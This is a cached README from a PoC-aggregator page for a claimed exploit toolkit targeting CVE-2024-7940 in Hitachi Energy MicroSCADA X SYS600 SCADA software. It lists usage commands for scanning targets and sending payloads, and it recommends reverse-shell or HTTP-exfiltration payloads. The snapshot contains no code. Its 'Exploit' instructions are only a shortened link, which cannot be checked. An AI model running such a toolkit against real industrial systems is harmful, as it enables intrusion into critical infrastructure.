Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-7940 PoC — Hitachi Energy MicroSCADA X SYS600 安全漏洞

Source
https://github.com/barbaraeivyu/CVE-2024-7940
Associated Vulnerability
Title:Hitachi Energy MicroSCADA X SYS600 安全漏洞 (CVE-2024-7940)
Description:Hitachi Energy MicroSCADA X SYS600是日本日立制作所(Hitachi)公司的一款 SCADA 产品。通过不同设备和系统之间的无缝集成和连接,确保您的开关站的优化控制和可靠运行。 Hitachi Energy MicroSCADA X SYS600存在安全漏洞,该漏洞源于向所有网络接口公开了一项仅适用于本地的服务(无需任何身份验证)。
Readme
# CVE-2024-7940 Exploit Toolkit

🌍 Overview

This repository provides a toolkit to validate and exploit the CVE-2024-7940 vulnerability in Hitachi Energy's MicroSCADA X SYS600 and MicroSCADA SYS600 products. The vulnerability exposes a local-only service to all network interfaces without authentication, posing a critical risk due to potential unauthorized access.

⚙️ Features
- ✅ Automatic detection of exposed MicroSCADA services
- ✅ Validates unauthenticated access to the service
- ✅ Supports proxy integration for traffic inspection (e.g., Burp/ZAP)
- ✅ Handles single or multiple target scanning
- ✅ Allows custom payload injection for service interaction

🧪 Affected Products
| Product | Affected Versions |
|---------|-------------------|
| Hitachi Energy MicroSCADA X SYS600 | All versions |

⚡ Vulnerability Summary
| Field | Value |
|-------|-------|
| Component | Hitachi Energy MicroSCADA X SYS600, MicroSCADA SYS600 |
| Issue | Unauthenticated Service Exposure on All Network Interfaces |
| CVE | CVE-2024-7940 |
| CVSSv3 | 9.8 |

🧰 Toolkit Components
- ✅ **exploit.py**: A Python script to scan and interact with the exposed MicroSCADA service.
  - Detects open services
  - Validates unauthenticated access
  - Sends custom payloads
- ✅ **example-payload.txt**: Sample payload for service interaction.

🚀 Usage

🔸 Basic Usage
```bash
python3 exploit.py -u target:port
```
🔸 Multiple Targets
```bash
python3 exploit.py -f targets.txt --proxy 127.0.0.1:8080:user:pass
```
🔸 All Arguments
| Argument | Description |
|----------|-------------|
| `-u` | Target URL (e.g., target:port) |
| `-f` | File containing target URLs (one per line) |
| `-p` | Payload file for service interaction (e.g., payloads/example-payload.txt) |
| `--proxy` | Optional proxy (e.g., 127.0.0.1:8080:user:pass) |
| `-t` | Timeout in seconds (default: 15) |

🔧 Requirements
- Python 3.10
- Install dependencies:
```bash
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```
- Network scanning tool (e.g., Nmap) for manual validation

About Payload Structure and Generating Payloads - Exploit Instrucion.md

## Exploit [href](https://tinyurl.com/2cu5csbx)

📡 Notes
- This vulnerability does not return direct command output. Use payloads that trigger observable actions (e.g., reverse shell or HTTP exfiltration).
- Mitigation: Restrict network access to the service and apply vendor patches.

# ⚠️ Legal Disclaimer
This toolkit is provided for educational and authorized security testing only. Do not use against systems without explicit permission. Misuse may be illegal and unethical.
File Snapshot

 [4.0K]  /data/pocs/c5a89c0246e13bb6f95116db62aeaaeefa1fa4b0
└── [2.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.